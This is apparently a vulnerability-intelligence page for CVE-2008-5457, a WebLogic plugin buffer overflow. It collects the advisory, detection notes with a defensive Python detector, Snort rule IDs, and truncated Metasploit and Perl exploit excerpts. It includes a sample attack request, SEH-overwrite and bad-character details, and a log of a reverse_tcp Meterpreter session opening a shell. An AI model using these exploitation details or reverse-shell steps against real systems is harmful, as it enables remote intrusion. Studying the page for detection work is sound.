CVE-2008-5457
Published: 2009-01-14
Priority: P2 · Severity: critical · CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit available · EPSS: 61.31% (99.0th percentile)
Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Affected (7 ranges): vendor oracle, product bea_product_suite. The version-range and fixed-in columns were not captured in the extract; the description above lists BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6 and 7.0 SP7.
Detection & IOCs (extracted from sources)
command: `POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie: TAGLINE=IAMMCLOVIN; JSESSIONID=<payload>`
snort: GID 1, SID 15477
snort: GID 1, SID 15263
- The exploit targets the JSESSIONID cookie value — monitor for HTTP requests with abnormally large (thousands of bytes) JSESSIONID cookie values sent to WebLogic-proxied endpoints.
- The vulnerability is only reachable when WebLogic clustering is configured; scope detection to clustered deployments.
- The IIS connector variant delivers the oversized payload via the URL query string (?;JSESSIONID=) rather than the Cookie header — inspect both locations.
- Bad characters in the payload are null byte, CR, LF, space, semicolon, equals, and comma — encoded shellcode in JSESSIONID values will avoid these bytes.
- The Metasploit exploit uses EXITFUNC=seh, indicating SEH-based exploitation; look for SEH chain overwrites in crash analysis of the WebLogic plugin process.
- The Perl PoC uses a partial SEH overwrite (2-byte value \x76\x79) following a backward JMP sled — this pattern is detectable in raw HTTP body content.
- The vulnerability is only exploitable when WebLogic clustering is configured in the Apache/Sun/IIS plugin; non-clustered deployments are not affected.
- Return addresses (ROP gadgets) in the Metasploit module are version-specific to WebLogic plugin DLL builds 1.0.1136334 and 1.0.1150354 on Windows Apache 2.2; other builds will require different offsets.
- The Perl PoC was tested only on Windows 2000 SP4 and Windows 2003 R2 SP2 without NX; systems with NX/DEP enabled may not be exploitable via this specific technique.
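As an added defensive example (not code from this page or from any of the sources it aggregates), the Python below inspects a raw HTTP request head for an oversized JSESSIONID in both locations the notes above name, the Cookie header and the request target; the 1024-byte threshold and the sample requests are constructed assumptions.

```python
import re
from typing import List, Tuple

# Assumed threshold (not from the page): a legitimate WebLogic session id is a few
# dozen bytes, while the exploit traffic described above carries thousands.
MAX_JSESSIONID_LEN = 1024

# JSESSIONID inside a Cookie header (Apache/Sun plugin variant) ...
_COOKIE_RE = re.compile(r"(?:^|;\s*)JSESSIONID=([^;\s]*)")
# ... or inside the request target, e.g. "/index.jsp?;JSESSIONID=..." (IIS connector variant).
_TARGET_RE = re.compile(r"[;?&]JSESSIONID=([^;&\s]*)")


def extract_jsessionids(raw: str) -> List[Tuple[str, str]]:
    """Return (location, value) pairs for every JSESSIONID in a raw HTTP/1.x request head."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    found = [("target", m.group(1)) for m in _TARGET_RE.finditer(target)]
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "cookie":
            found.extend(("cookie", m.group(1)) for m in _COOKIE_RE.finditer(value.strip()))
    return found


def inspect_request(raw: str, max_len: int = MAX_JSESSIONID_LEN) -> List[str]:
    """One finding per oversized JSESSIONID; an empty list means nothing was flagged.

    Scope the alert to hosts fronted by a WebLogic plugin with clustering enabled,
    since the notes above say non-clustered deployments are not affected.
    """
    return [
        f"oversized JSESSIONID in {location}: {len(value)} bytes"
        for location, value in extract_jsessionids(raw)
        if len(value) > max_len
    ]


# Constructed sample traffic (not captured data): a benign request, the Cookie-header
# variant and the IIS request-target variant, both carrying a 4000-byte value.
BENIGN = ("GET /index.jsp HTTP/1.1\r\nHost: localhost\r\n"
          "Cookie: TAGLINE=IAMMCLOVIN; JSESSIONID=abc123!1234567890\r\n\r\n")
COOKIE_VARIANT = ("POST /index.jsp HTTP/1.1\r\nHost: localhost\r\n"
                  "Cookie: TAGLINE=IAMMCLOVIN; JSESSIONID=" + "A" * 4000 + "\r\n\r\n")
IIS_VARIANT = ("GET /index.jsp?;JSESSIONID=" + "A" * 4000 + " HTTP/1.1\r\n"
               "Host: localhost\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("cookie", COOKIE_VARIANT), ("iis", IIS_VARIANT)):
        print(name, inspect_request(req) or "clean")
```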
No detection rules found.
Exploit-DB: BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit) (exploitdb · 2010-07-03 · CVE-2008-5457)
---
```ruby
##
# $Id: bea_weblogic_jsessionid.rb 9670 2010-07-03 03:19:07Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BEA WebLogic JSESSIONID Cookie Value Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable
        code is only accessible when clustering is configured. A request containing a
        long JSESSION cookie value can lead to arbitrary code execution.
      },
      'Author'         => 'pusscat',
      'Version'        => '$Revision: 9670 $',
      'Referenc
```
Exploit-DB: Oracle WebLogic IIS connector JSESSIONID - Remote Overflow (exploitdb · 2009-04-01 · CVSS 10.0 · CVE-2008-5457 [CRITICAL])
---
```perl
#!/usr/bin/perl
# No point in keeping this private anymore!
#
# k`sOSe - 02/16/2009 - CVE-2008-5457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# cohelet framework-3.2 # ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=80 E
# [*] Please wait while we load the module tree...
# [*] Handler binding to LHOST 0.0.0.0
# [*] Started reverse handler
# [*] Starting the payload handler...
# [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
# [*] Sending stage (75776 bytes)
# [*] Meterpreter session 1 opened (10.10.10.1:80 -> 10.10.10.4:2171)
#
# meterpreter > rev2self
# meterpreter > execute -i -f cmd.exe
# Process 3092 created.
# Channel 1 created.
# Microsoft Wind
```
Metasploit: BEA WebLogic JSESSIONID Cookie Value Overflow
This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a long JSESSION cookie value can lead to arbitrary code execution.
Talos: Rule release for today - April 21st 2009 (blogs_talos · 2009-04-21 · CVSS 10.0 · CVE-2009-0520 [CRITICAL])
A small set of new rules in today's release and a couple of modifications. Here are the highlights:
Adobe Flash Player Buffer Overflow (CVE-2009-0520):
Adobe Flash Player contains a programming error that may allow a remote attacker to execute code on a vulnerable system via a specially crafted flash file.
A rule to detect attacks targeting this vulnerability is included in this release and is identified with GID 1, SID 15478.
Oracle BEA WebLogic Buffer Overflow (CVE-2008-5457):
Oracle BEA WebLogic contains a programming error that may allow a remote attacker to execute code on a vulnerable system.
A rule to detect attacks targeting this vulnerability is included in this release and is identified with GID 1, SID 15477.
A previously released rule identified with GID 1, SID 15263 will a
Talos: Rule release for today - January 27th 2009 (blogs_talos · 2009-01-27 · CVSS 10.0 · CVE-2008-4006 [CRITICAL])
Large batch of Oracle vulnerabilities today. We've had to work through these carefully as details were pretty scant. Here's what we released:
- Oracle Secure Backup Command Injection (CVE-2008-4006)
- Oracle BPEL Injection (CVE-2008-4014)
- Oracle Secure Backup Command Injection (CVE-2008-5440)
- Oracle Secure Backup Buffer Overflow (CVE-2008-5444)
- Oracle Secure Backup Command Injection (CVE-2008-5448)
- Oracle Secure Backup Command Injection (CVE-2008-5449)
- Oracle BEA WebLogic Denial of Service (CVE-2008-5457)
More details can be found here: http://www.snort.org/vrt/advisories/vrt-rules-2009-01-27.html
References:
- http://secunia.com/advisories/33526
- http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html
- http://www.securityfocus.com/bid/33177
- http://www.securitytracker.com/id?1021571
- http://www.vupen.com/english/advisories/2009/0115